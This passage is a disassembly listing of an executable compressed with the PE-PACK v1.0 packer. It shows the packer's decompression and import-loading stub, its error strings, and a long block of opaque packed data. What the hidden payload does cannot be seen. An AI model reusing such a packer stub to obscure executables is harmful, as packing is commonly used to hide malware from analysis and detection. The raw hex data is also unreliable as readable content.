loc_519329: ; CODE XREF: sub_5192F3+24�j
lodsb
movzx ecx, al
or cl, cl
jz short loc_519338
cmp cl, 1
jz short loc_51933F
jmp short loc_519342
; ---------------------------------------------------------------------------
loc_519338: ; CODE XREF: sub_5192F3+3C�j
lodsw
movzx ecx, ax
jmp short loc_519342
; ---------------------------------------------------------------------------
loc_51933F: ; CODE XREF: sub_5192F3+41�j
lodsd
mov ecx, eax
loc_519342: ; CODE XREF: sub_5192F3+43�j
; sub_5192F3+4A�j
lodsb
movzx eax, al
loc_519346: ; CODE XREF: sub_5192F3+57�j
add ebx, eax
add [ebx], edx
loop loc_519346
jmp short loc_519302
; ---------------------------------------------------------------------------
locret_51934E: ; CODE XREF: sub_5192F3+3�j
; sub_5192F3+18�j
retn
sub_5192F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_51934F proc near ; CODE XREF: sub_519000+C1�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
push ebp
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
cld
mov dl, 80h
loc_51935D: ; CODE XREF: sub_51934F:loc_51936C�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_519363: ; CODE XREF: sub_51934F+72�j
; sub_51934F+B7�j ...
add dl, dl
jnz short loc_51936C
mov dl, [esi]
inc esi
adc dl, dl
loc_51936C: ; CODE XREF: sub_51934F+16�j
jnb short loc_51935D
add dl, dl
jnz short loc_519377
mov dl, [esi]
inc esi
adc dl, dl
loc_519377: ; CODE XREF: sub_51934F+21�j
jnb short loc_5193C3
xor eax, eax
add dl, dl
jnz short loc_519384
mov dl, [esi]
inc esi
adc dl, dl
loc_519384: ; CODE XREF: sub_51934F+2E�j
jnb loc_519460
add dl, dl
jnz short loc_519393
mov dl, [esi]
inc esi
adc dl, dl
loc_519393: ; CODE XREF: sub_51934F+3D�j
adc eax, eax
add dl, dl
jnz short loc_51939E
mov dl, [esi]
inc esi
adc dl, dl
loc_51939E: ; CODE XREF: sub_51934F+48�j
adc eax, eax
add dl, dl
jnz short loc_5193A9
mov dl, [esi]
inc esi
adc dl, dl
loc_5193A9: ; CODE XREF: sub_51934F+53�j
adc eax, eax
add dl, dl
jnz short loc_5193B4
mov dl, [esi]
inc esi
adc dl, dl
loc_5193B4: ; CODE XREF: sub_51934F+5E�j
adc eax, eax
jz short loc_5193BE
push edi
sub edi, eax
mov al, [edi]
pop edi
loc_5193BE: ; CODE XREF: sub_51934F+67�j
mov [edi], al
inc edi
jmp short loc_519363
; ---------------------------------------------------------------------------
loc_5193C3: ; CODE XREF: sub_51934F:loc_519377�j
mov eax, 1
loc_5193C8: ; CODE XREF: sub_51934F:loc_5193DC�j
add dl, dl
jnz short loc_5193D1
mov dl, [esi]
inc esi
adc dl, dl
loc_5193D1: ; CODE XREF: sub_51934F+7B�j
adc eax, eax
add dl, dl
jnz short loc_5193DC
mov dl, [esi]
inc esi
adc dl, dl
loc_5193DC: ; CODE XREF: sub_51934F+86�j
jb short loc_5193C8
sub eax, 2
jnz short loc_51940B
mov ecx, 1
loc_5193E8: ; CODE XREF: sub_51934F:loc_5193FC�j
add dl, dl
jnz short loc_5193F1
mov dl, [esi]
inc esi
adc dl, dl
loc_5193F1: ; CODE XREF: sub_51934F+9B�j
adc ecx, ecx
add dl, dl
jnz short loc_5193FC
mov dl, [esi]
inc esi
adc dl, dl
loc_5193FC: ; CODE XREF: sub_51934F+A6�j
jb short loc_5193E8
push esi
mov esi, edi
sub esi, ebp
rep movsb
pop esi
jmp loc_519363
; ---------------------------------------------------------------------------
loc_51940B: ; CODE XREF: sub_51934F+92�j
dec eax
shl eax, 8
mov al, [esi]
inc esi
mov ebp, eax
mov ecx, 1
loc_519419: ; CODE XREF: sub_51934F:loc_51942D�j
add dl, dl
jnz short loc_519422
mov dl, [esi]
inc esi
adc dl, dl
loc_519422: ; CODE XREF: sub_51934F+CC�j
adc ecx, ecx
add dl, dl
jnz short loc_51942D
mov dl, [esi]
inc esi
adc dl, dl
loc_51942D: ; CODE XREF: sub_51934F+D7�j
jb short loc_519419
cmp eax, 7D00h
jnb short loc_519450
cmp eax, 500h
jb short loc_51944B
inc ecx
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp loc_519363
; ---------------------------------------------------------------------------
loc_51944B: ; CODE XREF: sub_51934F+EC�j
cmp eax, 7Fh
ja short loc_519453
loc_519450: ; CODE XREF: sub_51934F+E5�j
add ecx, 2
loc_519453: ; CODE XREF: sub_51934F+FF�j
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp loc_519363
; ---------------------------------------------------------------------------
loc_519460: ; CODE XREF: sub_51934F:loc_519384�j
mov al, [esi]
inc esi
xor ecx, ecx
shr al, 1
jz short loc_51947C
adc ecx, 2
mov ebp, eax
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp loc_519363
; ---------------------------------------------------------------------------
loc_51947C: ; CODE XREF: sub_51934F+119�j
pop ebp
sub edi, [ebp+arg_4]
mov [ebp+var_4], edi
popa
pop ebp
retn
sub_51934F endp
; ---------------------------------------------------------------------------
dw 5000h
aEPackMemoryAle db 'E-PACK: MEMORY ALERT',0
aPePackImportLd db 'PE-PACK: IMPORT LDR ERROR',0
aMemoryAllocati db 'Memory allocation failed!',0
aUnableToLoadS db 'Unable to load %s',0
aSNotFoundInS db '%s not found in %s',0
aOrdinal_4xhNot db 'Ordinal %.4Xh not found in %s',0
dd offset sub_519000
dd 0
; =============== S U B R O U T I N E =======================================
sub_51951C proc near ; CODE XREF: sub_519000+78�p
jmp dword ptr [ebp+5A5h]
sub_51951C endp
; =============== S U B R O U T I N E =======================================
sub_519522 proc near ; CODE XREF: sub_519000+12B�p
jmp dword ptr [ebp+5A9h]
sub_519522 endp
; =============== S U B R O U T I N E =======================================
sub_519528 proc near ; CODE XREF: sub_519000+1D4�p
jmp dword ptr [ebp+599h]
sub_519528 endp
; =============== S U B R O U T I N E =======================================
sub_51952E proc near ; CODE XREF: sub_519000+1E3�p
jmp dword ptr [ebp+59Dh]
sub_51952E endp
; =============== S U B R O U T I N E =======================================
sub_519534 proc near ; CODE XREF: sub_519000+23D�p
jmp dword ptr [ebp+5A1h]
sub_519534 endp
; ---------------------------------------------------------------------------
dw 4
dd 70010000h, 70004085h, 4085h, 4000h, 1190h, 0E4000000h
dd 0E0004086h, 0A000002Eh, 0C5000006h, 68h, 9600h, 0
dd 70000000h, 85h, 0
dd 46000000h, 34000000h, 50000008h, 70000000h, 4085h, 2 dup(4000h)
dd 0
dd 80B6A100h, 801D777Ch, 80ADA07Ch, 809A517Ch, 809AE47Ch
dd 81CDDA7Ch, 7Ch, 45058A00h, 41A8AD7Eh, 7Eh, 52454B00h
dd 334C454Eh, 4C442E32h, 4Ch, 4D746547h, 6C75646Fh, 6E614865h
dd 41656C64h, 4C000000h, 4C64616Fh, 61726269h, 417972h
dd 65470000h, 6F725074h, 64644163h, 73736572h, 56000000h
dd 75747269h, 6C416C61h, 636F6Ch, 69560000h, 61757472h
dd 6572466Ch, 65h, 74697845h, 636F7250h, 737365h, 52455355h
dd 442E3233h, 4C4Ch, 73654D00h, 65676173h, 41786F42h, 77000000h
dd 69727073h, 4166746Eh, 100h, 80h, 0FFFFFF00h, 0FFh, 4 dup(0)
dd 1195C1h, 119599h, 3 dup(0)
dd 11962Ch, 1195B5h, 5 dup(0)
dd 1000h, 3FCDh, 1, 8000h, 54Ch, 1, 9000h, 2BAh, 1, 0
dd 0A0D0A0Dh, 0C4C40A0Dh, 0Dh dup(0C4C4C4C4h), 2D200A0Dh
dd 5020FE3Dh, 41502D45h, 76204B43h, 20302E31h, 202DFE2Dh
dd 20294328h, 79706F43h, 68676972h, 39312074h, 62203839h
dd 4E412079h, 4E694B41h, 2D3DFE20h, 0C40A0D20h, 0Dh dup(0C4C4C4C4h)
dd 0A0DC4h, 0A22h dup(0)
_data ends
; Section 2. (virtual address 0011C000)
; Virtual size : 00004C8B ( 19595.)
; Section size in file : 00004C8B ( 19595.)
; Offset to raw data for section: 0011C000
; Flags C0000020: Text Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_pdata segment para public 'CODE' use32
assume cs:_pdata
;org 51C000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 8000005Eh, 2B0000h, 1F07DC0Dh, 611B13DAh, 0EE441E69h
dd 666D45EEh, 0DD35FECAh, 32645F36h, 4518B24h, 82449E43h
dd 0F2C87A22h, 5BF0AA46h, 6C3A2951h, 0F2C1BE57h, 90DC34B2h
dd 6DA03E1h, 5D49EDCCh, 85AE0E33h, 0C3C5E591h, 0E08C5948h
dd 68E8291h, 0D677E7C8h, 0CCEF3356h, 0B9A2F7AFh, 21247D7Bh
dd 46CFFA2Bh, 7346CB66h, 0DDFD5543h, 6EF61DF3h, 0CC7B4E7Ah
dd 3585B377h, 441FA638h, 15F75142h, 2AF3899Fh, 44468F04h
dd 3F44A93h, 0B1C3C3FEh, 9BFAA730h, 0D55D89ABh, 7C1CA7A9h
dd 866D468Ah, 0C3BA2F1Ah, 0FF78872Bh, 7C2EB632h, 1D3A2D91h
dd 8A3D75B7h, 11988E10h, 303812C6h, 0EC6FFDF2h, 0A7B182F9h
dd 0F573EA85h, 0EAD8110h, 0F0F9CE5Dh, 3526265h, 0D8A65C94h
dd 0D9D3BF5Bh, 975145D3h, 0E9327BC1h, 0AB9DC9A0h, 4FA21D76h
dd 65816B04h, 0D01768B9h, 0D0DBBE92h, 8F7EED19h, 0E504467Eh
dd 38BF27CCh, 40CABAECh, 0B369FF46h, 0CC78A20Ch, 0BB73F8E1h
dd 3B08097Ah, 0B395F175h, 52B01639h, 3B6ACF78h, 63DC214Ah
dd 8116E647h, 9A402939h, 97B04BF6h, 677E34D3h, 0EF8C0BE9h
dd 0E79D2029h, 51701CCEh, 0F9A42CF9h, 844B6881h, 0B13AAA0Fh
dd 24BD5D45h, 9C383B56h, 0EAB27B77h, 0E98A12A2h, 963DC791h
dd 5E24D395h, 10A67C9Dh, 0E6644DF5h, 53585BE7h, 80EA2E53h
dd 0BBD29EE1h, 51C33676h, 0AC01DADEh, 27AD42ADh, 1AAFACE3h
dd 0FD3C25FDh, 0CFF6F913h, 5194F413h, 5BFB01A6h, 0A4E52D56h
dd 0CF2C8E20h, 0A305D047h, 0A6192C61h, 8C209A15h, 9DAA9BE8h
dd 73A97367h, 4DD6D720h, 117ABA85h, 2C695A3Fh, 0F0E1CB8Ch
dd 0A82D1828h, 0F596C618h, 5FAC544Ch, 91BAA14Eh, 0BDB8DC0Fh
dd 316BA0E3h, 0DE3CB2E8h, 0A38A7A33h, 37D4FC8Bh, 0B2BFA996h
dd 3CEF5C3Ah, 0F3493ADDh, 2F99A0A6h, 90C28FF2h, 157A9BAh
dd 1D0AA595h, 5A183ADEh, 68D10406h, 0A2C8D535h, 9E549441h
dd 45C15820h, 0CD87E084h, 8B4C212Dh, 79B586D9h, 15DDAA58h
dd 68616E2h, 48869545h, 0AB6C1E9Dh, 355488E4h, 3F3AC551h
dd 0AFAC15DFh, 506BE235h, 710FED22h, 0AF6C643Ah, 97001A4Ah
dd 91340D4Dh, 99F2AE86h, 1ABA1A37h, 0B2B1B08Eh, 3095C6A7h
dd 0CB67C8C2h, 210C934h, 44D7C6Ah, 15734D58h, 25AC9AAAh
dd 73A64127h, 40754E71h, 56C90CA9h, 84C3E929h, 74B4C50Bh
dd 4C85292h, 0DB5A8281h, 52EBE609h, 0A9EC6F55h, 0BDD2BC2Dh
dd 986BEF1Dh, 26D9F991h, 9D953A49h, 18B92221h, 179301E4h
dd 3BA08FDh, 0EA6B42F6h, 0DBC1867Ch, 205E0C9Ch, 0C69061CDh
dd 0F30F89C7h, 4254A456h, 0DBDBBDF3h, 74BA4216h, 0AE7C6020h
dd 0C01E7F6Fh, 658EE8B5h, 0BCB93438h, 0C9288206h, 286C8A81h
dd 5EE7D8F8h, 7E6B0EC1h, 0CBAA10Eh, 39ECF878h, 3359AF28h
dd 64B411Eh, 0BF2A37E5h, 3A07087Ch, 0A3020310h, 3FFE3687h
dd 3A0B5FECh, 82F1ED99h, 8361C61Bh, 0F733DFF4h, 8876D03Bh
dd 386DFEA6h, 8238C7BAh, 921CF5Ah, 0C0DF3515h, 0A21428A9h
dd 83FCE5B7h, 0E57C9E8Bh, 0CC12E99Fh, 81761D2Dh, 0B3EB7B67h
dd 0E3596024h, 8797663Dh, 0A95B2310h, 54C48533h, 2648F82Ah
dd 81EA80BFh, 88FC23FDh, 0FCD966F9h, 101FCF7Eh, 0D7FB741h
dd 86810DD1h, 56EE7ED8h, 0E6FDD89Dh, 8279E2Fh, 7690C518h
dd 299EB3ADh, 1A307723h, 0C11DA63h, 0DD51D8DBh, 11FC0D92h
dd 9B2C3B8Ah, 424D6676h, 5DBDADA4h, 0E133101Ah, 69D226A6h
dd 0FA5F9181h, 33DAD13h, 0E46D86C4h, 4E78F475h, 9BF9370Dh
dd 7CF1141Ch, 0E749B225h, 0EC76CDF1h, 22990233h, 0E1F0CDF1h
dd 0ECC60D26h, 22DC0947h, 0B7F9166Fh, 1707A826h, 3B1403E1h
dd 2C2C1805h, 4BF26E8Eh, 5AE63CB9h, 1E9EAD9Bh, 79C8F911h
dd 264BF8FCh, 0D1D5E134h, 6BE602Dh, 75890135h, 238F5AEh
dd 6077F379h, 4BEBC47h, 69133FB6h, 0F3408C9h, 0E76A7705h
dd 0DE33C5F4h, 3D08B3EEh, 0A25F63A3h, 4434BCC8h, 0AAC5ACD0h
dd 7A8B9185h, 39F397DBh, 0C5FE6F7Ch, 7CF9008Ah, 16379827h
dd 26CD16E9h, 938EC731h, 0A2D2B247h, 1162BF10h, 3A607CD6h
dd 0DC69961Dh, 2A4D0619h, 5E044EB9h, 0E656CF75h, 3CFC0381h
dd 9B824B48h, 337FBD0Ch, 61D05Ch, 0BB8D086Ah, 38FADB86h
dd 53A694DEh, 0F7C2F855h, 0D479E7Ch, 3C533E7Fh, 22B960CDh
dd 0EFF47C74h, 78186E95h, 67880A8Dh, 45265980h, 0FFB2487Dh
dd 0D1FDE4D9h, 0F2BDFFB0h, 0F9D7F324h, 32462633h, 276E5481h
dd 3B7CBC42h, 6412AEA5h, 46948ECBh, 6A73D607h, 0C3CA0EFh
dd 807C8BD6h, 345D3842h, 0E076C94Ch, 0E4B39B6Eh, 68A3B7BEh
dd 67350E5h, 0B7D4A9DEh, 3D6CA1B8h, 0F5E7DC23h, 6D827021h
dd 0EA574A67h, 7D043188h, 959F5FA9h, 0A71BB722h, 0FF90A82Ch
dd 4C0C78F3h, 0E05DAA15h, 77EA4B70h, 7E393127h, 20F31164h
dd 2F5CC0E6h, 4E6F65F3h, 0D6BB2C45h, 0F7D82199h, 4CA93E2Ah
dd 960DA7AFh, 366D20C8h, 0D6F31676h, 58E37D74h, 0FC6ECA90h
dd 0B4BAB670h, 1E5316C3h, 0A9677796h, 746F6D4Dh, 94628CF5h
dd 0D6349BFEh, 0E53E2B52h, 0B78E7148h, 207A5611h, 3C7E6878h
dd 4A547A62h, 53F7A407h, 35886E40h, 7255706Dh, 0D32C1D6Dh
dd 55659D59h, 2AED8E3Bh, 0C4F027C8h, 31CB92F8h, 7310CC27h
dd 5E215BBBh, 2B0662C1h, 0C013CB5Dh, 77B15FDDh, 92D7814Bh
dd 731D20B8h, 0AD458671h, 0B01013ACh, 9E5FE25h, 62DEC989h
dd 7A33CCA9h, 54D5ABA0h, 55A3041Eh, 0DBE4C25Ah, 0DFCD5737h
dd 47505B3Eh, 3D14A0EAh, 686ED9C7h, 92D5B6C9h, 34129F8Bh
dd 0BF101590h, 61399187h, 0DF93F5ADh, 2FA17D84h, 0EC7005DAh
dd 42E02EC3h, 0D9814B7Dh, 5F71374Ch, 0D3CDFD85h, 9512EFA2h
dd 59657857h, 4B20AD27h, 37523D80h, 5CCEA173h, 0E59C2D1Ch
dd 990DAA96h, 0BC840D44h, 7340D694h, 0DE06A2C8h, 1968244Fh
dd 9D4FA05Ah, 0E14E9668h, 0C5B4184Ah, 954188FBh, 0DFBA626Fh
dd 7241CFB2h, 9C68EE04h, 6E3F1186h, 0B4BB317Bh, 8168C9F5h
dd 0C19F9EAEh, 0F9F7D311h, 0C1FD5A82h, 7B2D005Fh, 0DA7E465Eh
dd 0BE136FE3h, 0B329B12Dh, 0BC0EF79Ch, 3279D77Eh, 0D77E6BE1h
dd 885DA3D7h, 79166D3Ah, 0CE6E9D39h, 18E4D400h, 0E35B1032h
dd 40F1D18Ch, 4507C910h, 3875B094h, 3FAC1150h, 95D44676h
dd 57DBE18Ah, 78E3E547h, 9767C12Fh, 3E7D293Fh, 1D20CD97h
dd 0DB2D017Dh, 276CE9A4h, 9B17AD60h, 0CC81C8ECh, 74BC2506h
dd 0DDBC426Dh, 0BD3E3A3Eh, 45CABD5Fh, 257433C8h, 0D2FDCB21h
dd 0C99C97D3h, 6AE148AFh, 96F0F875h, 4C116327h, 0ED0E95A9h
dd 0BA2D582Dh, 0DB2A1DD0h, 0F2C6AA57h, 0C445389Eh, 0B5480430h
dd 0E38C6E20h, 0A88DBE5h, 760BBD27h, 0A31AAF44h, 0CD620F8Bh
dd 9C046052h, 88A96A34h, 0BBF6A3h, 0FBAE7644h, 0FCD86A23h
dd 0D044041h, 0DEA9F47h, 0D945B85Eh, 0B9B09D64h, 5B21B2E0h
dd 0C2CF22D0h, 0B1B98F3Bh, 2FD7696Fh, 3C6FD53h, 0E62B8E63h
dd 0FFD8E9h, 57C717C8h, 29AF9E8Dh, 0F8EFBE5Ch, 0E0BAEE05h
dd 8E823970h, 758D7634h, 0FFA2E954h, 0B0C243E1h, 0E1060765h
dd 99806CBDh, 6B53DAB2h, 3F02CE80h, 0A599BBE8h, 3BD1960h
dd 0F56096C2h, 8FC07A51h, 0A8AE30Eh, 0BC5DC289h, 0A1C94DA7h
dd 2F309CF5h, 0ECD7D21Bh, 0D197F68Ah, 2FBC308Bh, 0E30132B0h
dd 1C1CF5E7h, 11E687D8h, 98D7E51Fh, 6591C2ACh, 0AF126E89h
dd 8A496B33h, 15B62256h
dd 0BA000A91h, 14B45D74h, 26EB2FBEh, 922EC304h, 0EDBE8E07h
dd 9CBA8AFh, 0A5904EB0h, 57886D26h, 0E4A3438Bh, 1D31B6Eh
dd 3C839D1Eh, 1E2386h, 869D6D82h, 0DFB37599h, 922D1FF1h
dd 1E9BD047h, 7D446C1Ah, 0C0DBF15Fh, 211B22CCh, 5DF95B6Ah
dd 22231D92h, 0C5946D2Ch, 0B7FC8202h, 3582BFDAh, 0F0096F9h
dd 0A90673FEh, 900CCBEAh, 0A02C2FDCh, 0F81768DDh, 741DD7F6h
dd 14F2995Ah, 0E16E25BDh, 0DA107485h, 1F59CAB8h, 554F8CCEh
dd 0FE79982Bh, 33C549EFh, 0B25959DFh, 37FC96F5h, 7DAF625Dh
dd 24C07175h, 13D2DBCFh, 0BA331045h, 12BE7980h, 0D416FF7Ah
dd 0E035BF83h, 4C535BBh, 0D7BE567Dh, 541B7DAAh, 0E27C6107h
dd 6A914921h, 0CF079018h, 0A2651563h, 0EB88D536h, 0EA9BFFCEh
dd 0E6FB3CB1h, 0E1E596EDh, 0D105A0AFh, 816CC7FDh, 0DEB035D5h
dd 0C2E7D416h, 7F63C77Dh, 9E4CE660h, 248D7E0h, 0B241EFC0h
dd 0D1DF07FBh, 0C8830D40h, 677FF253h, 24B831Dh, 25791F33h
dd 131B984Eh, 42635E48h, 0DC9F33C7h, 0BEA891E7h, 35BF88D9h
dd 25C8C715h, 0B1D971C2h, 6B8FF904h, 3AE4ED2Ch, 70565D30h
dd 0D542F01Dh, 25A4BAFBh, 3D20DC22h, 0F9101265h, 0EC781C81h
dd 1B6370B7h, 0FFF0F275h, 15C7E4F8h, 0EF6FACF3h, 0C4E9F9F1h
dd 906B5496h, 0C400FBC9h, 42B67657h, 8562CACDh, 4EF60E73h
dd 7962332Bh, 64C44493h, 0D352CFB7h, 48CA7E73h, 0D74F9182h
dd 5A26AB20h, 0F4B61855h, 0E4256AE6h, 0B50E44B6h, 0E1B82909h
dd 5EFF4ECDh, 704CC892h, 1653E655h, 0D10072C5h, 462C1DB7h
dd 5DE6D379h, 2E31B7DEh, 1DCEA852h, 7791F49Dh, 0A06F9944h
dd 63F5E4A9h, 0E9AEFD97h, 523AEF8h, 0E4E23DD0h, 492C87C0h
dd 10177546h, 5F84E556h, 29ED48Eh, 0E3A98653h, 0BF1D2563h
dd 37025000h, 0D96579D3h, 7387B554h, 0CF9825ECh, 5773691Ah
dd 0F8A9C636h, 9FA29340h, 0EFDF941h, 0A545BC93h, 0EF3DE7AAh
dd 151A8250h, 5B13288Fh, 0FDE70039h, 0C108F108h, 0AF19D48Ch
dd 7A886E9Fh, 0B147AE35h, 0D6B3F48h, 4F4D8A9Fh, 0ABA73972h
dd 0AB691D5Eh, 0C54B6293h, 0C203E652h, 15B72EADh, 508C2296h
dd 51366372h, 66C21F89h, 0B5D18FD7h, 12849223h, 2DE3B322h
dd 0E2B66DC6h, 0DEF8533Ah, 5D95E54Eh, 0BB0A4DE6h, 6291C02Ch
dd 652923C3h, 59E7CE12h, 2002513Bh, 72EBCB3Ah, 79F07A1Ah
dd 4269F6DBh, 54F3465Ch, 37F22687h, 0E9E783B4h, 9AF3DAF2h
dd 0B4F5BB18h, 3DF24E50h, 33E87FEAh, 0B43123D8h, 1C96AA2Eh
dd 0E4282F4Fh, 0B73DB876h, 42197A2Dh, 29152870h, 4ED417F9h
dd 42C5D64Dh, 0FF138326h, 0ABBA7CC6h, 20033871h, 7FCF9604h
dd 9BBE25EAh, 4EDF4BB0h, 7D12C192h, 90CFA082h, 0A74E558Fh
dd 1E1B671Eh, 58BFC021h, 966416CBh, 0C3ABFF71h, 4250AF3h
dd 0AA6BBF20h, 249F4EA1h, 0F37EBD05h, 48AFBCE5h, 1F264340h
dd 0E8AEDB65h, 0BD0F9ADCh, 55BB2D20h, 76DB0A28h, 0F9BF683h
dd 0F7E1559Ah, 187CBB7Ah, 79E90E12h, 9AA09AD7h, 6C2A5E0Bh
dd 61B47233h, 8ADD5436h, 2AA0D7A0h, 922670DDh, 220F4BAh
dd 0FCE7E4B5h, 4FE14C25h, 0C78B0B40h, 0E9410E56h, 6D93D75h
dd 0AEB08808h, 7CEDABC9h, 1426095Ah, 0A7E16B76h, 0E04E53ECh
dd 85AD2A9Dh, 0C13E348Dh, 0D4211EA3h, 0BCC73Ch, 5245A688h
dd 9AABE756h, 0E2E80A71h, 0CCCAE00Ah, 589939F1h, 75512EB6h
dd 2B16C9D5h, 13323E70h, 42DC7984h, 1A0C142Fh, 0C9EE0BB4h
dd 3BEBFA1Bh, 140B3191h, 17D5BFCBh, 0A0C1E80h, 56796680h
dd 0D1C302BBh, 0D5853DD7h, 4F8C292Eh, 0E8A54A93h, 1C0D27DCh
dd 1A03FA06h, 0F32A7390h, 64D1A2DAh, 564717DCh, 841ADEC9h
dd 416A2F85h, 0A599E4C7h, 2FD653F4h, 0BDF45B78h, 0A98DED31h
dd 0FC21B657h, 12D8EDC0h, 6AA84039h, 657E6435h, 6B43BB92h
dd 0D6C2F3C2h, 95927795h, 59D1F809h, 91955E92h, 2D2259EAh
dd 0ED1DCA6Ah, 0F169062Fh, 6F527FB3h, 7B7FDA62h, 0B1E574EBh
dd 588B4E9h, 90695D7Fh, 0CB24025Bh, 0FE9C466Ch, 11D98187h
dd 0BDF96FB1h, 0FBFAA363h, 727DAF11h, 0A4E96824h, 34ADB7BCh
dd 1A2B0062h, 0F9804083h, 2C1B6429h, 9988EEF8h, 1922FC24h
dd 0C9B63EB3h, 73AA850Ch, 36020194h, 4A1A9F53h, 26B8E368h
dd 9AA5D029h, 0D01C6B94h, 18FB250h, 0A6737DE7h, 4C498D60h
dd 26011376h, 5021159Eh, 33B028B2h, 0F76A999Ch, 15E1621Fh
dd 8FD8918Fh, 0EA08074Ah, 0FC09FF3h, 0F424C385h, 2BC6686h
dd 0AD697CDDh, 42E0A3F6h, 0E932290h, 59636FB1h, 0B7758A7Ch
dd 71CA4F7Dh, 0C433472Eh, 0C6784EAFh, 6EF93A6Ah, 0D6B5CDC4h
dd 0C1DB4AC5h, 0C063F6B5h, 0C5C483BFh, 0D8AB7CA3h, 7BB524E1h
dd 1B1BEC66h, 0B4BD329Dh, 0F0D55384h, 7D535AFCh, 516E9F02h
dd 13C53C8Fh, 56F4FB4Ch, 5CD52FC3h, 0E79B0AF3h, 87CC476Dh
dd 0D1CE5879h, 0BAF5AB3Bh, 43313901h, 0CE10DDD8h, 24E26A7Dh
dd 34922B8Ah, 0A93FDC19h, 0A3081215h, 0B98185D3h, 5B1F2ABFh
dd 3407008Fh, 3E724084h, 8894ACE5h, 0EB43F02Ch, 0BF51C3BBh
dd 7F5C2670h, 0EE96D1D3h, 0F256CB64h, 42CEAB8Fh, 0E6334F44h
dd 20D177Ch, 0D9A50243h, 7AE9C694h, 4CE98A69h, 62B6130h
dd 698705Bh, 20326DB3h, 874EA0CDh, 0FAADDD01h, 0A26D9CD4h
dd 0BF09F57Dh, 0B531FD07h, 0AEB32EBh, 8C53776Dh, 54380594h
dd 0DDF7DDC8h, 89ABCB8Ah, 0A7560F72h, 0AA770FB2h, 9C61CC59h
dd 58EE5591h, 62ED8F45h, 0D0ED489h, 145BFA84h, 0B7E5451Eh
dd 0DFCE98E5h, 0D189932Dh, 0F5928FC6h, 5B96F3B7h, 35F04A45h
dd 176627BBh, 4ABF41BFh, 87CED0C3h, 614A193h, 0A724C7A1h
dd 46ADEA70h, 89E35295h, 0F7DAA9B8h, 1E3886F9h, 261123DAh
dd 0DF59313Bh, 45A1C8F7h, 9B2DBE4Fh, 91AEB94Fh, 0C435C933h
dd 0B46B870Ah, 83A03CDDh, 90A28FEFh, 0E68DFDF3h, 71B0B5E5h
dd 53DD32DFh, 8E0C7FE4h, 0F7094EFBh, 7EE26ACh, 38E74ED4h
dd 430A8B59h, 49BDCB2Fh, 8EC48417h, 681B91BFh, 1AD47F99h
dd 545ED4DDh, 7CBCCBAAh, 0B83692B0h, 15DD690Bh, 4803FD99h
dd 75186AAh, 830AC1E3h, 52ECA4A6h, 0DB8C450Fh, 4BCE39A8h
dd 31B5DADFh, 3305C2CBh, 6358236Ch, 3360A644h, 39BDCD29h
dd 0D3923D4Dh, 99558CDFh, 0E1865D80h, 4E2FB324h, 3364C6Dh
dd 6F0B3601h, 50FA05C3h, 371DE9E0h, 0C36FC214h, 6B8F229Ch
dd 370C4CD9h, 0D8D43701h, 0FDC45A75h, 0C022A63Dh, 36FA2683h
dd 0FE95610Dh, 4244D105h, 59F3D680h, 0BA820002h, 0BDE36D81h
dd 954884BEh, 0D344DF4Ah, 0D756562Fh, 0B8401EE9h, 6918ACB9h
dd 1BA401D1h, 88DD9B89h, 0EBCF146Eh, 4AA8223Bh, 47AC405h
dd 0A6F3E635h, 9F99A6Eh, 5ABD7D3h, 7A4D8424h, 8F6B4AEDh
dd 0A100F9DEh, 32571FD2h, 33517071h, 0D296741h, 0EEC40ACCh
dd 0D8D18B89h, 47EF15A9h, 757E4243h, 0A2CD8262h, 7FD587A5h
dd 0DA7F85D5h, 4F82DD32h, 0B2CB0C0Dh, 7E500AB9h, 76A8431Fh
dd 0FB22CA81h, 8FEB2CD4h, 0A2D34DD8h, 0EBB31415h, 1FE11FCFh
dd 54E5FAACh, 0BF359205h, 0BB13307Bh, 22533F81h, 0B9FE4221h
dd 44EDF0C4h, 7CCCC082h, 4A0348BDh, 0BD293C56h, 2E3CD6E2h
dd 92AFAF20h, 62E930B6h, 43E3BD1h, 5406E1F8h, 0F6A9F2C2h
dd 4E6FCA4Fh, 0A119E5ADh, 56224485h, 0C4D3024Dh, 8BB601Eh
dd 9A0B50D2h, 0AA3E2EF4h, 0AD5C352Fh, 602694EAh, 7277B0D9h
dd 9FC39782h, 35987250h
dd 505C9979h, 978554C6h, 6C742289h, 0D4307C5Dh, 0C0FF0F8Eh
dd 0EA75AB27h, 5B7CA0FBh, 965BF908h, 0D9D1C04Ch, 78E3BF14h
dd 5B15F13Fh, 38E0A097h, 96EBB21Dh, 0C25991A3h, 0EAF5F215h
dd 0D8FE0518h, 40BD8B62h, 0CDB8F9E4h, 851745C5h, 0F6B5F750h
dd 0C18BD908h, 3AB7DFF9h, 0BF1D9DA5h, 9197F6CBh, 9E088082h
dd 9D34E4Eh, 5894D463h, 9E82027Ch, 6931AFD3h, 1F59083Fh
dd 4523BC2Dh, 0E0BFBFEFh, 785F1DAh, 0F9E7D74Fh, 0C29648EEh
dd 48B37AADh, 96DC4371h, 8574E0Fh, 3514C6BBh, 0D7F04B67h
dd 29DAA477h, 0B6810408h, 3B944032h, 0F7E13065h, 12DFD7EBh
dd 8B3D3A31h, 5DE0F6DDh, 0A9CC4EDDh, 0DBE96996h, 0D7039898h
dd 53803977h, 7C0F04C3h, 0EDC4C11Ch, 0E231AF5Bh, 94012CB1h
dd 0C81B2414h, 0D6418288h, 84467AF6h, 0E432B794h, 0C9BD7693h
dd 8A3246F3h, 22EF9DD6h, 5DE7CB3Eh, 406BCA1Ch, 488E5C97h
dd 5D51D7C3h, 0A83B2507h, 0EBB7EF67h, 4C64A2D0h, 7A236FE3h
dd 0E22330A5h, 986BAE9h, 0F3A0420Dh, 0D49D635Ah, 56C755B8h
dd 6263403Fh, 0AAE2EB24h, 33CA3E42h, 6342607Eh, 0D4BDEF9Dh
dd 0D7C26141h, 5EB7851Bh, 2A343F5h, 4EA2F5D6h, 0D0356546h
